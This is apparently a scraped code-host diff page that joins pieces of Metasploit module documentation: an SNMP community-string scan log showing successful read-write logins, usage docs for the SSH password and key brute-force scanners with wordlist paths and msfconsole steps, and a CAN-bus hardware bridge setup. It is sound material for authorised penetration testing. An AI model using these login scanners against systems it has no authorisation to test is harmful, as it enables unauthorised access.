[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[*] Scanned 29 of 58 hosts (50% complete)
[*] Scanned 35 of 58 hosts (60% complete)
[*] Scanned 41 of 58 hosts (70% complete)
[*] Scanned 47 of 58 hosts (81% complete)
[+] 10.25.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
```
## Confirming
Since SNMP has been around for quite a while, there are many tools which can also be used to verify this configuration issue.
The following are other industry tools which can also be used.
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and password combinations. For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
## Verification Steps
1. Install SSH and start it.
2. Start msfconsole
3. Do: ` use auxiliary/scanner/ssh/ssh_login`
4. Do: `set rhosts`
5. Do: set usernames and passwords via any of the available options
5. Do: `run`
6. You will hopefully see something similar to, followed by a session:
Boolean value on if an additional login attempt should be attempted with an empty password for every user.
**PASSWORD**
Password to try for each user.
**PASS_FILE**
A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each password.
**USERPASS_FILE**
A file containing a username and password, separated by a space, on every line. An example line would be `username password`
**USER_AS_PASS**
Boolean value on if an additional login attempt should be attempted with the password as the username.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed attempt will look similar to the following:
```
[-] SSH - Failed: 'msfadmin:virtual'
```
## Option Combinations
It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
This module makes a combination of all of the above when attempting logins. So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
## Scenarios
Example run against:
* Ubuntu 14.04 Server with root login permitted: 192.168.2.156
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and private key combinations. For username and password logins, please use `auxiliary/scanner/ssh/ssh_login`.
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
### Key Generation
On most modern *nix Operating System, the `ssh-keygen` command can be utilized to create an SSH key. Metasploit expects the key to be unencrypted, so no password should be set during `ssh-keygen`.
After following the prompts to create the SSH key pair, the `pub` key needs to be added to the authorized_keys list. To do so simply run: `cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys`
## Verification Steps
1. Install SSH and start it.
2. Create an SSH keypair and add the public key to the `authorized_keys` file
3. Start msfconsole
4. Do: ` use auxiliary/scanner/ssh/ssh_login_pubkey`
5. Do: `set rhosts`
6. Do: set usernames with one of the available options
7. Do: `set KEY_PATH ` to either a file or path
7. Do: `run`
8. You will hopefully see something similar to the following:
A string to the private key to attempt, or a folder containing private keys to attempt. Any file name starting with a period (`.`) or ending in `.pub` will be ignored.
An SSH key is typically kept in a user's home directory under `.ssh/id_rsa`. The file contents, when not encrypted with a password will start with `-----BEGIN RSA PRIVATE KEY-----`
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each password.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `KEY_PATH`s are used. A failed attempt will look similar to the following: `[-] SSH - Failed`
## Option Combinations
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set in `USERNAME`, and be part of `USER_FILE`.
This module makes a combination of all of the above when attempting logins. So if a username is set in `USERNAME`, and a `USER_FILE` is listed, usernames will be generated from BOTH of these.
## Scenarios
Example run with a FOLDER set for `KEY_PATH` against:
* Ubuntu 14.04 Server
While the two SSH key are nearly identical, one character has been modified in one of the keys to prevent a successful login.
```
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
This is a sample hardware bridge that demonstrates how to connect the HWBridge API to metasploit.
It demonstrates some bare minimum capabilities to report back to the hardware connector and
establish a hwbridge session. This module provides an example on how to connect any hardware
component to Metasploit. It is also a fully functional interface to SocketCAN and will work
to create an automotive HW Bridge.
## Setup a Test
To experimient with using Metasploit to send automtovie CAN bus packets you can use
the SocketCAN capabilities of Linux to create a virtual CAN device. NOTE: If you have a
supported CAN sniffer you could also use a real can device.
In order for the local_hwbridge to inteface with SocketCAN you will need:
* can-utils
Once those are installed you can setup a virtual CAN inteface using:
```
sudo modprobe can
sudo modprobe vcan
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0
```
Once that is setup you can simply launch the module and it should auto detect any
CAN intefaces you have active on the system.
```
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:8080/xaUKu68Va
[*] Local IP: http://10.1.10.21:8080/xaUKu68Va
[*] Server started.
```
By default it will create a random URI, in this case it's xaUKu68Va.
## Connecting to the HWBridge
You will need to use the auxiliary/client/hwbridge/connect to connect
to the local_hwbridge. You can either use the same machine or another machine to
connect to your local_hwbridge. Just make sure the TARGETURI matches the randomly
generated URI
```
set TARGETURI xaUKu68Va
```
Then simply type run and you should connect to the HW bridge and a hwbridge session
should be established. You can switch to the hwbridge session to interact with
this module.
See the documentation for auxiliary/client/hwbridge/connect for more information on
the hwbridge sessions.
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.
Brent Cook
